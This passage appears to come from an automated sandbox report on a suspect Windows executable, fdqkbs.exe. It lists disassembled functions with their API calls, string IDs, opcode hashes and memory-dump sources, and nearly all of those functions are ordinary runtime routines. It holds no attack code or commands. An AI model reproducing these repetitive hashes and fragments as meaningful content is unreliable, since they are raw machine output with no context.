                                                                                  • Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                                                                                  • Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
                                                                                  • Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                                                                                  • Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00402347
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004023D8
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00402403
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00402458
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: <&@$csm
                                                                                  • API String ID: 1170836740-4289465445
                                                                                  • Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                                                                                  • Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
                                                                                  • Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                                                                                  • Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,120632A0,?,004083E2,00000002,00000000,00000000), ref: 00408394
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 3664257935-537541572
                                                                                  • Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                                                                                  • Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
                                                                                  • Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                                                                                  • Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
                                                                                  • SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                                                                                  • Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
                                                                                  • Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                                                                                  • Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,120632A0,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                                                                                  • Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
                                                                                  • Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                                                                                  • Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • __alloca_probe_16.LIBCMT ref: 00409B45
                                                                                  • __alloca_probe_16.LIBCMT ref: 00409C0E
                                                                                  • __freea.LIBCMT ref: 00409C75
                                                                                    • Part of subcall function 00407D48: RtlAllocateHeap.NTDLL(00000000,00406E77,?), ref: 00407D7A
                                                                                  • __freea.LIBCMT ref: 00409C88
                                                                                  • __freea.LIBCMT ref: 00409C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1423051803-0
                                                                                  • Opcode ID: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                                                                                  • Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
                                                                                  • Opcode Fuzzy Hash: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                                                                                  • Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ]A$8H]$C:\Users\user\AppData\Local\Temp\fdqkbs.exe
                                                                                  • API String ID: 0-25343034
                                                                                  • Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                                                                                  • Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
                                                                                  • Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                                                                                  • Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
                                                                                  • GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 3177248105-2084034818
                                                                                  • Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                                                                                  • Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
                                                                                  • Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                                                                                  • Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetConsoleOutputCP.KERNEL32(120632A0,00000000,00000000,00000008), ref: 00409FF0
                                                                                    • Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
                                                                                  • GetLastError.KERNEL32 ref: 0040A32B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                  • String ID:
                                                                                  • API String ID: 2112829910-0
                                                                                  • Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                                                                                  • Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
                                                                                  • Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                                                                                  • Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer
                                                                                  • String ID:
                                                                                  • API String ID: 1740715915-0
                                                                                  • Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                                                                                  • Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
                                                                                  • Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                                                                                  • Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
                                                                                  • GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789
                                                                                    • Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F
                                                                                  • ___initconout.LIBCMT ref: 0040B799
                                                                                    • Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724
                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                  • String ID:
                                                                                  • API String ID: 2744216297-0
                                                                                  • Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                                                                                  • Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
                                                                                  • Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                                                                                  • Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0507E289
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentThread
                                                                                  • String ID: LR;v$LR;v
                                                                                  • API String ID: 2882836952-2984026332
                                                                                  • Opcode ID: 7289d5e0733ae1416688721ea0564b60c719f202e24fb0b101ed0aeb9f25f059
                                                                                  • Instruction ID: 3dbeb30ed255afae132d1298e8d9d4d51851014c1dd2c8a813ad3598cfbee418
                                                                                  • Opcode Fuzzy Hash: 7289d5e0733ae1416688721ea0564b60c719f202e24fb0b101ed0aeb9f25f059
                                                                                  • Instruction Fuzzy Hash: 09817B70D0524C8FDB50DFA9D844AAEBBF6FF88300F24846AD815BB350DB74A945CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00403CB5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EncodePointer
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 2118026453-2084237596
                                                                                  • Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                                                                                  • Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
                                                                                  • Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                                                                                  • Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
                                                                                  • ___raise_securityfailure.LIBCMT ref: 00402045
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                  • String ID: HYA
                                                                                  • API String ID: 3761405300-3949630065
                                                                                  • Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                                                                                  • Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
                                                                                  • Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                                                                                  • Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CommandLine
                                                                                  • String ID: (4]
                                                                                  • API String ID: 3253501508-1743720692
                                                                                  • Opcode ID: 1862c5febd86a67a8cc931a8f9cf79bc572b9c2a7d58cda9ff65f2b50cd382cf
                                                                                  • Instruction ID: 1c3be78323f1457dba36cc2e926ef687e279e392227457d27b0df23f55036d34
                                                                                  • Opcode Fuzzy Hash: 1862c5febd86a67a8cc931a8f9cf79bc572b9c2a7d58cda9ff65f2b50cd382cf
                                                                                  • Instruction Fuzzy Hash: 92B09278800A20CFC7008F32FA4E2C87BA0B28820A780C876E919D2B20E7740022DF1C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%